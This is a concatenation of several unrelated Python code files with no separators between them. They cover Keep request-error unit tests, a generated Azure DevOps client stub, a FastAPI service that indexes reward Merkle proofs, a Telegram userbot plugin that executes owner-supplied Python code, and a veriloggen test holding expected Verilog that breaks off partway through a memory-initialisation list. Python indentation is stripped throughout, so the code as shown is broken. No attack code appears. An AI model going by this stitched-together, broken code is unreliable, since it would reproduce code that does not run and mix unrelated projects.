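    # (service URL, exception) pairs reused by the request-error test cases below.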
REQUEST_ERRORS = [
('http://keep1.zzzzz.example.org/', IOError("test IOError")),
('http://keep3.zzzzz.example.org/', MemoryError("test MemoryError")),
('http://keep5.zzzzz.example.org/',
arv_error.HttpError(500, "Internal Server Error")),
('http://keep7.zzzzz.example.org/', IOError("second test IOError")),
]
def check_get_message(self, *args):
test_exc = arv_error.KeepRequestError("test message", *args)
self.assertEqual("test message", test_exc.message)
def test_get_message_with_request_errors(self):
self.check_get_message(self.REQUEST_ERRORS[:])
def test_get_message_without_request_errors(self):
self.check_get_message()
def check_get_request_errors(self, *args):
expected = dict(args[0]) if args else {}
test_exc = arv_error.KeepRequestError("test service exceptions", *args)
self.assertEqual(expected, test_exc.request_errors())
def test_get_request_errors(self):
self.check_get_request_errors(self.REQUEST_ERRORS[:])
def test_get_request_errors_none(self):
self.check_get_request_errors({})
def test_empty_exception(self):
test_exc = arv_error.KeepRequestError()
self.assertFalse(test_exc.message)
self.assertEqual({}, test_exc.request_errors())
def traceback_str(self, exc):
return traceback.format_exception_only(type(exc), exc)[-1]
def test_traceback_str_without_request_errors(self):
message = "test plain traceback string"
test_exc = arv_error.KeepRequestError(message)
exc_report = self.traceback_str(test_exc)
self.assertTrue(exc_report.startswith("KeepRequestError: "))
self.assertIn(message, exc_report)
def test_traceback_str_with_request_errors(self):
message = "test traceback shows Keep services"
test_exc = arv_error.KeepRequestError(message, self.REQUEST_ERRORS[:])
exc_report = self.traceback_str(test_exc)
self.assertTrue(exc_report.startswith("KeepRequestError: "))
for expect_substr in [message, "raised IOError", "raised MemoryError",
"test MemoryError", "second test IOError",
"responded with 500 Internal Server Error"]:
self.assertIn(expect_substr, exc_report)
# Assert the report maintains order of listed services.
last_index = -1
for service_key, _ in self.REQUEST_ERRORS:
service_index = exc_report.find(service_key)
self.assertGreater(service_index, last_index)
last_index = service_index
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Generated file, DO NOT EDIT
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------------------------
from msrest import Serializer, Deserializer
from ...client import Client
from . import models
class AuthorizationClient(Client):
"""Authorization
:param str base_url: Service URL
:param Authentication creds: Authenticated credentials.
"""
def __init__(self, base_url=None, creds=None):
super(AuthorizationClient, self).__init__(base_url, creds)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._deserialize = Deserializer(client_models)
resource_area_identifier = '2e426be0-da4d-48c4-9178-978da8562255'
import logging
import os
from typing import List, Optional
import sentry_sdk
import uvicorn
from dotenv import load_dotenv
from fastapi import Depends, FastAPI, HTTPException
from fastapi_utils.tasks import repeat_every
from sqlalchemy.orm import Session
from . import crud, models, schemas
from .config import config
from .database import SessionLocal, engine, get_db, get_fastapi_sessionmaker
from .indexer import Indexer
load_dotenv()
LOGLEVEL = os.environ.get("LOGLEVEL", "INFO").upper()
logging.basicConfig(level=LOGLEVEL)
models.Base.metadata.create_all(bind=engine)
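# Fail fast at startup if any required environment variable is missing.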
for expected_env in [
"SUBGRAPH_URL",
"REWARDS_BUCKET",
"ENVIRONMENT",
]:
if expected_env not in os.environ:
raise ValueError(f"Missing environment variable {expected_env}")
SUBGRAPH_URL = os.environ.get("SUBGRAPH_URL")
REWARDS_BUCKET = os.environ.get("REWARDS_BUCKET")
ENVIRONMENT = os.environ.get("ENVIRONMENT")
SENTRY_DSN = os.environ.get("SENTRY_DSN")
app = FastAPI()
if SENTRY_DSN is not None:
sentry_sdk.init(
SENTRY_DSN,
# Set traces_sample_rate to 1.0 to capture 100%
# of transactions for performance monitoring.
# We recommend adjusting this value in production.
traces_sample_rate=1.0,
environment=ENVIRONMENT,
)
@app.on_event("startup")
@repeat_every(seconds=5, raise_exceptions=True)
def index_root_task() -> None:
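    # Every 5 seconds, index rewards from the subgraph into the database and the
    # configured rewards bucket; exceptions are logged so the repeating task
    # keeps running.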
sessionmaker = get_fastapi_sessionmaker()
with sessionmaker.context_session() as db:
try:
Indexer(SUBGRAPH_URL, config[ENVIRONMENT]["archived_reward_programs"]).run(
db=db, storage_location=REWARDS_BUCKET
)
except Exception as e:
logging.error(e)
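# Common pagination query parameters, injected into endpoints via Depends(param).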
def param(skip: int = 0, limit: int = 100):
return {"skip": skip, "limit": limit}
@app.get("/about/")
async def about():
return {
"subgraph_url": SUBGRAPH_URL,
"rewards_bucket": REWARDS_BUCKET,
"environment": ENVIRONMENT,
}
@app.get("/")
async def root():
return {"status": "ok"}
@app.get("/merkle-proofs/{payee}", response_model=List[schemas.Proof])
def read_proofs(
db: Session = Depends(get_db),
proof_filter: dict = Depends(schemas.ProofFilter),
param: dict = Depends(param),
):
return crud.get_proofs(db, proof_filter=proof_filter, param=param)
if __name__ == "__main__":
uvicorn.run("cardpay_reward_api.main:app", host="0.0.0.0", log_level="info")
<reponame>ALiwoto/SCP-5170
# https://greentreesnakes.readthedocs.io/
# https://gitlab.com/blankX/sukuinote/-/blob/master/sukuinote/plugins/pyexec.py
import ast
import sys
import html
import inspect
import asyncio
from shortuuid import ShortUUID
from io import StringIO, BytesIO
from scp import user, bot
from scp.utils.selfInfo import info
from scp.utils.parser import getMediaAttr
exec_tasks = {}
@user.on_message(
~user.filters.forwarded
& ~user.filters.sticker
& ~user.filters.via_bot
& ~user.filters.edited
& user.filters.me
& user.filters.command(
'eval',
prefixes=user._config.get('scp-5170', 'prefixes').split(),
),
)
async def pyexec(client: user, message: user.types.Message):
code = message.text.split(None, 1)[1]
tree = ast.parse(code)
obody = tree.body
body = obody.copy()
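    # Append a `return _ueri` sentinel so the wrapped coroutine returns it when
    # the user code has no explicit return; async_obj() below filters it out.
    # If the code is an async generator, a value-returning `return` is illegal,
    # so fall back to compiling the original body unchanged.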
body.append(ast.Return(ast.Name('_ueri', ast.Load())))
try:
exx = _gf(body)
except SyntaxError as ex:
if ex.msg != "'return' with value in async generator":
raise
exx = _gf(obody)
rnd_id = '#' + str(ShortUUID().random(length=5))
reply = await message.reply_text(
f'Executing <code>{rnd_id}</code>',
quote=True,
)
oasync_obj = exx(
client,
client,
message,
message,
reply,
message.reply_to_message,
message.reply_to_message,
UniqueExecReturnIdentifier,
)
if inspect.isasyncgen(oasync_obj):
async def async_obj():
return [i async for i in oasync_obj]
else:
async def async_obj():
to_return = [await oasync_obj]
return [] if to_return == [
UniqueExecReturnIdentifier,
] else to_return
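    # Capture stdout/stderr while the user code runs so anything printed can be
    # included in the reply.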
stdout = sys.stdout
stderr = sys.stderr
wrapped_stdout = StringIO()
try:
sys.stdout = sys.stderr = wrapped_stdout
task = asyncio.create_task(async_obj())
exec_tasks[rnd_id] = task
try:
returned = await task
except Exception as err:
returned = err
return await reply.edit_text(
user.md.KanTeXDocument(
user.md.Section('Error:', user.md.Code(err)),
),
)
except asyncio.CancelledError:
sys.stdout = stdout
sys.stderr = stderr
exec_tasks.pop(rnd_id, None)
return await reply.edit_text(
user.md.KanTeXDocument(
user.md.Section(
'Task Cancelled:',
user.md.Code(f'{rnd_id} has been canceled.'),
),
),
)
finally:
sys.stdout = stdout
sys.stderr = stderr
exec_tasks.pop(rnd_id, None)
wrapped_stdout.seek(0)
output = ''
wrapped_stdout_text = wrapped_stdout.read().strip()
if wrapped_stdout_text:
output += f'<code>{html.escape(wrapped_stdout_text)}</code>\n'
for i in returned:
output += f'<code>{html.escape(str(i).strip())}</code>\n'
if not output.strip():
output = 'Success'
if len(output) > 4096:
out = wrapped_stdout_text + '\n'
for i in returned:
out += str(i).strip() + '\n'
f = BytesIO(out.strip().encode('utf-8'))
f.name = 'output.txt'
await asyncio.gather(reply.delete(), message.reply_document(f))
else:
await reply.edit_text(
user.md.KanTeXDocument(
user.md.Section('Output:', user.md.Code(output)),
),
)
@user.on_message(user.filters.me & user.command('listEval'))
async def listexec(_, message: user.types.Message):
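    # Ask the helper bot for its `_listEval` inline results and forward each one
    # back to the chat; a missing peer or a bot timeout means there are no tasks.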
try:
x = await user.get_inline_bot_results(
info['_bot_username'],
'_listEval',
)
except (
user.exceptions.PeerIdInvalid,
user.exceptions.BotResponseTimeout,
):
return await message.reply('no tasks', quote=True)
for m in x.results:
await message.reply_inline_bot_result(x.query_id, m.id, quote=True)
@bot.on_inline_query(
user.filters.user(info['_user_id'])
& user.filters.regex('^_listEval'),
)
async def _(_, query: user.types.InlineQuery):
buttons = [[
user.types.InlineKeyboardButton(
text='cancel all',
callback_data='cancel_eval_all',
),
]]
for x, _ in exec_tasks.items():
buttons.append(
[
user.types.InlineKeyboardButton(
text=x, callback_data=f'cancel_eval_{x}',
),
],
)
await query.answer(
results=[
user.types.InlineQueryResultArticle(
title='list eval tasks',
input_message_content=user.types.InputTextMessageContent(
user.md.KanTeXDocument(
user.md.Section(
'ListEvalTasks',
user.md.KeyValueItem(
'Tasks Running',
str(len(exec_tasks)),
),
),
),
),
reply_markup=user.types.InlineKeyboardMarkup(buttons),
),
],
cache_time=0,
)
@bot.on_callback_query(
user.filters.user(info['_user_id'])
& user.filters.regex('^cancel_'),
)
async def cancelexec(_, query: user.types.CallbackQuery):
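    # Callback data looks like `cancel_eval_<task id>` (or `cancel_eval_all`),
    # so split out the task type and identifier.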
Type = query.data.split('_')[1]
taskID = query.data.split('_')[2]
if Type == 'eval':
if taskID == 'all':
for _, i in exec_tasks.items():
i.cancel()
return await query.edit_message_text(
'All tasks has been cancelled',
)
else:
try:
task = exec_tasks.get(taskID)
except IndexError:
return
if not task:
return await query.answer(
'Task does not exist anymore',
show_alert=True,
)
task.cancel()
return await query.edit_message_text(f'{taskID} has been cancelled')
@user.on_message(
user.sudo
& user.command('GetID'),
)
async def _(_, message: user.types.Message):
message = message.reply_to_message or message
media = getMediaAttr(
message,
[
'audio',
'document',
'photo',
'sticker',
'animation',
'video',
'voice',
'video_note',
'new_chat_photo',
],
)
appendable = [
user.md.KeyValueItem(
user.md.Bold('chatID'),
user.md.Code(message.chat.id),
),
user.md.KeyValueItem(
user.md.Bold('fromUserID'),
user.md.Code(message.from_user.id),
),
]
text = user.md.Section('getID')
if not media:
for a in appendable:
text.append(a)
return await message.reply(user.md.KanTeXDocument(text))
medias = [
user.md.KeyValueItem(
user.md.Bold('fileID'),
user.md.Code(media.file_id),
),
user.md.KeyValueItem(
user.md.Bold('fileUniqueID'),
user.md.Code(media.file_unique_id),
),
]
for media in medias:
appendable.append(media)
for a in appendable:
text.append(a)
return await message.reply(user.md.KanTeXDocument(text))
def _gf(body):
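    # Wrap the parsed statements in `async def ex(c, client, m, message,
    # executing, r, reply, _ueri)`, compile the module, and return the resulting
    # coroutine function so the user code runs with those names in scope.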
func = ast.AsyncFunctionDef(
'ex',
ast.arguments(
[],
[
ast.arg(
i, None, None,
) for i in [
'c',
'client',
'm',
'message',
'executing',
'r',
'reply',
'_ueri',
]
],
None,
[],
[],
None,
[],
),
body,
[],
None,
None,
)
ast.fix_missing_locations(func)
mod = ast.parse('')
mod.body = [func]
fl = locals().copy()
exec(compile(mod, '<ast>', 'exec'), globals(), fl)
return fl['ex']
class UniqueExecReturnIdentifier:
pass
from __future__ import absolute_import
from __future__ import print_function
import veriloggen
import thread_fixed_ram_initvals
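# Golden Verilog source expected from the thread_fixed_ram_initvals example
# (the test harness presumably compares it with the generated RTL).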
expected_verilog = """
module test;
reg CLK;
reg RST;
blinkled
uut
(
.CLK(CLK),
.RST(RST)
);
initial begin
$dumpfile("uut.vcd");
$dumpvars(0, uut);
end
initial begin
CLK = 0;
forever begin
#5 CLK = !CLK;
end
end
initial begin
RST = 0;
#100;
RST = 1;
#100;
RST = 0;
#10000;
$finish;
end
endmodule
module blinkled
(
input CLK,
input RST
);
reg [10-1:0] myram_0_addr;
wire [32-1:0] myram_0_rdata;
reg [32-1:0] myram_0_wdata;
reg myram_0_wenable;
myram
inst_myram
(
.CLK(CLK),
.myram_0_addr(myram_0_addr),
.myram_0_rdata(myram_0_rdata),
.myram_0_wdata(myram_0_wdata),
.myram_0_wenable(myram_0_wenable)
);
reg [32-1:0] th_blink;
localparam th_blink_init = 0;
reg signed [32-1:0] _th_blink_times_0;
reg signed [32-1:0] _th_blink_i_1;
reg _tmp_0;
reg _myram_cond_0_1;
reg _myram_cond_1_1;
reg _myram_cond_1_2;
reg signed [32-1:0] _tmp_1;
wire signed [32-1:0] _tmp_fixed_0;
assign _tmp_fixed_0 = _tmp_1;
reg signed [32-1:0] _th_blink_rdata_2;
reg _tmp_2;
reg _myram_cond_2_1;
reg _myram_cond_3_1;
reg _myram_cond_3_2;
reg signed [32-1:0] _tmp_3;
wire signed [32-1:0] _tmp_fixed_1;
assign _tmp_fixed_1 = _tmp_3;
reg signed [32-1:0] _th_blink_b_3;
reg signed [33-1:0] _th_blink_wdata_4;
reg _myram_cond_4_1;
reg signed [32-1:0] _th_blink_sum_5;
reg _tmp_4;
reg _myram_cond_5_1;
reg _myram_cond_6_1;
reg _myram_cond_6_2;
reg signed [32-1:0] _tmp_5;
wire signed [32-1:0] _tmp_fixed_2;
assign _tmp_fixed_2 = _tmp_5;
always @(posedge CLK) begin
if(RST) begin
myram_0_addr <= 0;
_myram_cond_0_1 <= 0;
_tmp_0 <= 0;
_myram_cond_1_1 <= 0;
_myram_cond_1_2 <= 0;
_myram_cond_2_1 <= 0;
_tmp_2 <= 0;
_myram_cond_3_1 <= 0;
_myram_cond_3_2 <= 0;
myram_0_wdata <= 0;
myram_0_wenable <= 0;
_myram_cond_4_1 <= 0;
_myram_cond_5_1 <= 0;
_tmp_4 <= 0;
_myram_cond_6_1 <= 0;
_myram_cond_6_2 <= 0;
end else begin
if(_myram_cond_1_2) begin
_tmp_0 <= 0;
end
if(_myram_cond_3_2) begin
_tmp_2 <= 0;
end
if(_myram_cond_6_2) begin
_tmp_4 <= 0;
end
if(_myram_cond_0_1) begin
_tmp_0 <= 1;
end
_myram_cond_1_2 <= _myram_cond_1_1;
if(_myram_cond_2_1) begin
_tmp_2 <= 1;
end
_myram_cond_3_2 <= _myram_cond_3_1;
if(_myram_cond_4_1) begin
myram_0_wenable <= 0;
end
if(_myram_cond_5_1) begin
_tmp_4 <= 1;
end
_myram_cond_6_2 <= _myram_cond_6_1;
if(th_blink == 3) begin
myram_0_addr <= _th_blink_i_1;
end
_myram_cond_0_1 <= th_blink == 3;
_myram_cond_1_1 <= th_blink == 3;
if(th_blink == 9) begin
myram_0_addr <= _th_blink_i_1;
end
_myram_cond_2_1 <= th_blink == 9;
_myram_cond_3_1 <= th_blink == 9;
if(th_blink == 13) begin
myram_0_addr <= _th_blink_i_1;
myram_0_wdata <= _th_blink_wdata_4;
myram_0_wenable <= 1;
end
_myram_cond_4_1 <= th_blink == 13;
if(th_blink == 19) begin
myram_0_addr <= _th_blink_i_1;
end
_myram_cond_5_1 <= th_blink == 19;
_myram_cond_6_1 <= th_blink == 19;
end
end
localparam th_blink_1 = 1;
localparam th_blink_2 = 2;
localparam th_blink_3 = 3;
localparam th_blink_4 = 4;
localparam th_blink_5 = 5;
localparam th_blink_6 = 6;
localparam th_blink_7 = 7;
localparam th_blink_8 = 8;
localparam th_blink_9 = 9;
localparam th_blink_10 = 10;
localparam th_blink_11 = 11;
localparam th_blink_12 = 12;
localparam th_blink_13 = 13;
localparam th_blink_14 = 14;
localparam th_blink_15 = 15;
localparam th_blink_16 = 16;
localparam th_blink_17 = 17;
localparam th_blink_18 = 18;
localparam th_blink_19 = 19;
localparam th_blink_20 = 20;
localparam th_blink_21 = 21;
localparam th_blink_22 = 22;
localparam th_blink_23 = 23;
localparam th_blink_24 = 24;
localparam th_blink_25 = 25;
always @(posedge CLK) begin
if(RST) begin
th_blink <= th_blink_init;
_th_blink_times_0 <= 0;
_th_blink_i_1 <= 0;
_tmp_1 <= 0;
_tmp_3 <= 0;
_tmp_5 <= 0;
end else begin
case(th_blink)
th_blink_init: begin
_th_blink_times_0 <= 10;
th_blink <= th_blink_1;
end
th_blink_1: begin
_th_blink_i_1 <= 0;
th_blink <= th_blink_2;
end
th_blink_2: begin
if(_th_blink_i_1 < _th_blink_times_0) begin
th_blink <= th_blink_3;
end else begin
th_blink <= th_blink_7;
end
end
th_blink_3: begin
if(_tmp_0) begin
_tmp_1 <= myram_0_rdata;
end
if(_tmp_0) begin
th_blink <= th_blink_4;
end
end
th_blink_4: begin
_th_blink_rdata_2 <= _tmp_fixed_0;
th_blink <= th_blink_5;
end
th_blink_5: begin
$display("rdata = %f", ($itor(_th_blink_rdata_2) / 256.0));
th_blink <= th_blink_6;
end
th_blink_6: begin
_th_blink_i_1 <= _th_blink_i_1 + 1;
th_blink <= th_blink_2;
end
th_blink_7: begin
_th_blink_i_1 <= 0;
th_blink <= th_blink_8;
end
th_blink_8: begin
if(_th_blink_i_1 < _th_blink_times_0) begin
th_blink <= th_blink_9;
end else begin
th_blink <= th_blink_16;
end
end
th_blink_9: begin
if(_tmp_2) begin
_tmp_3 <= myram_0_rdata;
end
if(_tmp_2) begin
th_blink <= th_blink_10;
end
end
th_blink_10: begin
_th_blink_rdata_2 <= _tmp_fixed_1;
th_blink <= th_blink_11;
end
th_blink_11: begin
_th_blink_b_3 <= 'sd64;
th_blink <= th_blink_12;
end
th_blink_12: begin
_th_blink_wdata_4 <= _th_blink_rdata_2 + _th_blink_b_3;
th_blink <= th_blink_13;
end
th_blink_13: begin
th_blink <= th_blink_14;
end
th_blink_14: begin
$display("wdata = %f", ($itor(_th_blink_wdata_4) / 256.0));
th_blink <= th_blink_15;
end
th_blink_15: begin
_th_blink_i_1 <= _th_blink_i_1 + 1;
th_blink <= th_blink_8;
end
th_blink_16: begin
_th_blink_sum_5 <= 'sd0;
th_blink <= th_blink_17;
end
th_blink_17: begin
_th_blink_i_1 <= 0;
th_blink <= th_blink_18;
end
th_blink_18: begin
if(_th_blink_i_1 < _th_blink_times_0) begin
th_blink <= th_blink_19;
end else begin
th_blink <= th_blink_24;
end
end
th_blink_19: begin
if(_tmp_4) begin
_tmp_5 <= myram_0_rdata;
end
if(_tmp_4) begin
th_blink <= th_blink_20;
end
end
th_blink_20: begin
_th_blink_rdata_2 <= _tmp_fixed_2;
th_blink <= th_blink_21;
end
th_blink_21: begin
$display("rdata = %f", ($itor(_th_blink_rdata_2) / 256.0));
th_blink <= th_blink_22;
end
th_blink_22: begin
_th_blink_sum_5 <= _th_blink_sum_5 + _th_blink_rdata_2;
th_blink <= th_blink_23;
end
th_blink_23: begin
_th_blink_i_1 <= _th_blink_i_1 + 1;
th_blink <= th_blink_18;
end
th_blink_24: begin
$display("sum = %f", ($itor(_th_blink_sum_5) / 256.0));
th_blink <= th_blink_25;
end
endcase
end
end
endmodule
module myram
(
input CLK,
input [10-1:0] myram_0_addr,
output [32-1:0] myram_0_rdata,
input [32-1:0] myram_0_wdata,
input myram_0_wenable
);
reg [10-1:0] myram_0_daddr;
reg [32-1:0] mem [0:1024-1];
initial begin
mem[0] = 32'ha00;
mem[1] = 32'ha80;
mem[2] = 32'hb00;
mem[3] = 32'hb80;
mem[4] = 32'hc00;
mem[5] = 32'hc80;
mem[6] = 32'hd00;
mem[7] = 32'hd80;
mem[8] = 32'he00;
mem[9] = 32'he80;
mem[10] = 32'hf00;
mem[11] = 32'hf80;
mem[12] = 32'h1000;
mem[13] = 32'h1080;
mem[14] = 32'h1100;
mem[15] = 32'h1180;
mem[16] = 32'h1200;
mem[17] = 32'h1280;
mem[18] = 32'h1300;
mem[19] = 32'h1380;
mem[20] = 32'h1400;
mem[21] = 32'h1480;
mem[22] = 32'h1500;
mem[23] = 32'h1580;
mem[24] = 32'h1600;
mem[25] = 32'h1680;
mem[26] = 32'h1700;
mem[27] = 32'h1780;
mem[28] = 32'h1800;
mem[29] = 32'h1880;
mem[30] = 32'h1900;
mem[31] = 32'h1980;
mem[32] = 32'h1a00;
mem[33] = 32'h1a80;
mem[34] = 32'h1b00;
mem[35] = 32'h1b80;
mem[36] = 32'h1c00;
mem[37] = 32'h1c80;
mem[38] = 32'h1d00;
mem[39] = 32'h1d80;
mem[40] = 32'h1e00;
mem[41] = 32'h1e80;
mem[42] = 32'h1f00;
mem[43] = 32'h1f80;
mem[44] = 32'h2000;
mem[45] = 32'h2080;
mem[46] = 32'h2100;
mem[47] = 32'h2180;
mem[48] = 32'h2200;
mem[49] = 32'h2280;
mem[50] = 32'h2300;
mem[51] = 32'h2380;
mem[52] = 32'h2400;
mem[53] = 32'h2480;
mem[54] = 32'h2500;
mem[55] = 32'h2580;
mem[56] = 32'h2600;
mem[57] = 32'h2680;
mem[58] = 32'h2700;
mem[59] = 32'h2780;
mem[60] = 32'h2800;
mem[61] = 32'h2880;
mem[62] = 32'h2900;
mem[63] = 32'h2980;
mem[64] = 32'h2a00;
mem[65] = 32'h2a80;
mem[66] = 32'h2b00;
mem[67] = 32'h2b80;
mem[68] = 32'h2c00;
mem[69] = 32'h2c80;
mem[70] = 32'h2d00;
mem[71] = 32'h2d80;
mem[72] = 32'h2e00;
mem[73] = 32'h2e80;
mem[74] = 32'h2f00;
mem[75] = 32'h2f80;
mem[76] = 32'h3000;
mem[77] = 32'h3080;
mem[78] = 32'h3100;
mem[79] = 32'h3180;
mem[80] = 32'h3200;
mem[81] = 32'h3280;
mem[82] = 32'h3300;
mem[83] = 32'h3380;
mem[84] = 32'h3400;
mem[85] = 32'h3480;
mem[86] = 32'h3500;
mem[87] = 32'h3580;
mem[88] = 32'h3600;
mem[89] = 32'h3680;
mem[90] = 32'h3700;
mem[91] = 32'h3780;
mem[92] = 32'h3800;
mem[93] = 32'h3880;
mem[94] = 32'h3900;
mem[95] = 32'h3980;
mem[96] = 32'h3a00;
mem[97] = 32'h3a80;
mem[98] = 32'h3b00;
mem[99] = 32'h3b80;
mem[100] = 32'h3c00;
mem[101] = 32'h3c80;
mem[102] = 32'h3d00;
mem[103] = 32'h3d80;
mem[104] = 32'h3e00;
mem[105] = 32'h3e80;
mem[106] = 32'h3f00;
mem[107] = 32'h3f80;
mem[108] = 32'h4000;
mem[109] = 32'h4080;
mem[110] = 32'h4100;
mem[111] = 32'h4180;
mem[112] = 32'h4200;
mem[113] = 32'h4280;
mem[114] = 32'h4300;
mem[115] = 32'h4380;
mem[116] = 32'h4400;
mem[117] = 32'h4480;
mem[118] = 32'h4500;
mem[119] = 32'h4580;
mem[120] = 32'h4600;
mem[121] = 32'h4680;
mem[122] = 32'h4700;
mem[123] = 32'h4780;
mem[124] = 32'h4800;
mem[125] = 32'h4880;
mem[126] = 32'h4900;
mem[127] = 32'h4980;
mem[128] = 32'h4a00;
mem[129] = 32'h4a80;
mem[130] = 32'h4b00;
mem[131] = 32'h4b80;
mem[132] = 32'h4c00;
mem[133] = 32'h4c80;
mem[134] = 32'h4d00;
mem[135] = 32'h4d80;
mem[136] = 32'h4e00;
mem[137] = 32'h4e80;
mem[138] = 32'h4f00;
mem[139] = 32'h4f80;
mem[140] = 32'h5000;
mem[141] = 32'h5080;
mem[142] = 32'h5100;
mem[143] = 32'h5180;
mem[144] = 32'h5200;
mem[145] = 32'h5280;
mem[146] = 32'h5300;
mem[147] = 32'h5380;
mem[148] = 32'h5400;
mem[149] = 32'h5480;
mem[150] = 32'h5500;
mem[151] = 32'h5580;
mem[152] = 32'h5600;
mem[153] = 32'h5680;
mem[154] = 32'h5700;
mem[155] = 32'h5780;
mem[156] = 32'h5800;
mem[157] = 32'h5880;
mem[158] = 32'h5900;
mem[159] = 32'h5980;
mem[160] = 32'h5a00;
mem[161] = 32'h5a80;
mem[162] = 32'h5b00;
mem[163] = 32'h5b80;
mem[164] = 32'h5c00;
mem[165] = 32'h5c80;
mem[166] = 32'h5d00;
mem[167] = 32'h5d80;
mem[168] = 32'h5e00;
mem[169] = 32'h5e80;
mem[170] = 32'h5f00;
mem[171] = 32'h5f80;
mem[172] = 32'h6000;
mem[173] = 32'h6080;
mem[174] = 32'h6100;
mem[175] = 32'h6180;
mem[176] = 32'h6200;
mem[177] = 32'h6280;
mem[178] = 32'h6300;
mem[179] = 32'h6380;
mem[180] = 32'h6400;
mem[181] = 32'h6480;
mem[182] = 32'h6500;
mem[183] = 32'h6580;
mem[184] = 32'h6600;
mem[185] = 32'h6680;
mem[186] = 32'h6700;
mem[187] = 32'h6780;
mem[188] = 32'h6800;
mem[189] = 32'h6880;
mem[190] = 32'h6900;
mem[191] = 32'h6980;
mem[192] = 32'h6a00;
mem[193] = 32'h6a80;
mem[194] = 32'h6b00;
mem[195] = 32'h6b80;
mem[196] = 32'h6c00;
mem[197] = 32'h6c80;
mem[198] = 32'h6d00;
mem[199] = 32'h6d80;
mem[200] = 32'h6e00;
mem[201] = 32'h6e80;
mem[202] = 32'h6f00;
mem[203] = 32'h6f80;
mem[204] = 32'h7000;
mem[205] = 32'h7080;
mem[206] = 32'h7100;
mem[207] = 32'h7180;
mem[208] = 32'h7200;
mem[209] = 32'h7280;
mem[210] = 32'h7300;
mem[211] = 32'h7380;
mem[212] = 32'h7400;
mem[213] = 32'h7480;
mem[214] = 32'h7500;
mem[215] = 32'h7580;
mem[216] = 32'h7600;
mem[217] = 32'h7680;
mem[218] = 32'h7700;
mem[219] = 32'h7780;
mem[220] = 32'h7800;
mem[221] = 32'h7880;
mem[222] = 32'h7900;
mem[223] = 32'h7980;
mem[224] = 32'h7a00;
mem[225] = 32'h7a80;
mem[226] = 32'h7b00;
mem[227] = 32'h7b80;
mem[228] = 32'h7c00;
mem[229] = 32'h7c80;
mem[230] = 32'h7d00;
mem[231] = 32'h7d80;
mem[232] = 32'h7e00;
mem[233] = 32'h7e80;
mem[234] = 32'h7f00;
mem[235] = 32'h7f80;
mem[236] = 32'h8000;
mem[237] = 32'h8080;
mem[238] = 32'h8100;
mem[239] = 32'h8180;
mem[240] = 32'h8200;
mem[241] = 32'h8280;
mem[242] = 32'h8300;
mem[243] = 32'h8380;
mem[244] = 32'h8400;
mem[245] = 32'h8480;
mem[246] = 32'h8500;
mem[247] = 32'h8580;
mem[248] = 32'h8600;
mem[249] = 32'h8680;
mem[250] = 32'h8700;
mem[251] = 32'h8780;
mem[252] = 32'h8800;
mem[253] = 32'h8880;
mem[254] = 32'h8900;
mem[255] = 32'h8980;
mem[256] = 32'h8a00;
mem[257] = 32'h8a80;
mem[258] = 32'h8b00;
mem[259] = 32'h8b80;
mem[260] = 32'h8c00;
mem[261] = 32'h8c80;
mem[262] = 32'h8d00;
mem[263] = 32'h8d80;
mem[264] = 32'h8e00;
mem[265] = 32'h8e80;
mem[266] = 32'h8f00;
mem[267] = 32'h8f80;
mem[268] = 32'h9000;
mem[269] = 32'h9080;
mem[270] = 32'h9100;
mem[271] = 32'h9180;
mem[272] = 32'h9200;
mem[273] = 32'h9280;
mem[274] = 32'h9300;
mem[275] = 32'h9380;
mem[276] = 32'h9400;
mem[277] = 32'h9480;
mem[278] = 32'h9500;
mem[279] = 32'h9580;
mem[280] = 32'h9600;
mem[281] = 32'h9680;
mem[282] = 32'h9700;
mem[283] = 32'h9780;
mem[284] = 32'h9800;
mem[285] = 32'h9880;
mem[286] = 32'h9900;
mem[287] = 32'h9980;
mem[288] = 32'h9a00;
mem[289] = 32'h9a80;
mem[290] = 32'h9b00;
mem[291] = 32'h9b80;
mem[292] = 32'h9c00;
mem[293] = 32'h9c80;
mem[294] = 32'h9d00;
mem[295] = 32'h9d80;
mem[296] = 32'h9e00;
mem[297] = 32'h9e80;
mem[298] = 32'h9f00;
mem[299] = 32'h9f80;
mem[300] = 32'ha000;
mem[301] = 32'ha080;
mem[302] = 32'ha100;
mem[303] = 32'ha180;
mem[304] = 32'ha200;
mem[305] = 32'ha280;
mem[306] = 32'ha300;
mem[307] = 32'ha380;
mem[308] = 32'ha400;
mem[309] = 32'ha480;
mem[310] = 32'ha500;
mem[311] = 32'ha580;
mem[312] = 32'ha600;
mem[313] = 32'ha680;
mem[314] = 32'ha700;
mem[315] = 32'ha780;
mem[316] = 32'ha800;
mem[317] = 32'ha880;
mem[318] = 32'ha900;
mem[319] = 32'ha980;
mem[320] = 32'haa00;
mem[321] = 32'haa80;
mem[322] = 32'hab00;
mem[323] = 32'hab80;
mem[324] = 32'hac00;
mem[325] = 32'hac80;
mem[326] = 32'had00;
mem[327] = 32'had80;
mem[328] = 32'hae00;
mem[329] = 32'hae80;
mem[330] = 32'haf00;
mem[331] = 32'haf80;
mem[332] = 32'hb000;
mem[333] = 32'hb080;
mem[334] = 32'hb100;
mem[335] = 32'hb180;
mem[336] = 32'hb200;
mem[337] = 32'hb280;
mem[338] = 32'hb300;
mem[339] = 32'hb380;
mem[340] = 32'hb400;
mem[341] = 32'hb480;
mem[342] = 32'hb500;
mem[343] = 32'hb580;
mem[344] = 32'hb600;
mem[345] = 32'hb680;
mem[346] = 32'hb700;
mem[347] = 32'hb780;
mem[348] = 32'hb800;
mem[349] = 32'hb880;
mem[350] = 32'hb900;
mem[351] = 32'hb980;
mem[352] = 32'hba00;
mem[353] = 32'hba80;
mem[354] = 32'hbb00;
mem[355] = 32'hbb80;
mem[356] = 32'hbc00;
mem[357] = 32'hbc80;
mem[358] = 32'hbd00;
mem[359] = 32'hbd80;
mem[360] = 32'hbe00;
mem[361] = 32'hbe80;
mem[362] = 32'hbf00;
mem[363] = 32'hbf80;
mem[364] = 32'hc000;
mem[365] = 32'hc080;
mem[366] = 32'hc100;
mem[367] = 32'hc180;
mem[368] = 32'hc200;
mem[369] = 32'hc280;
mem[370] = 32'hc300;
mem[371] = 32'hc380;
mem[372] = 32'hc400;
mem[373] = 32'hc480;
mem[374] = 32'hc500;
mem[375] = 32'hc580;
mem[376] = 32'hc600;
mem[377] = 32'hc680;
mem[378] = 32'hc700;
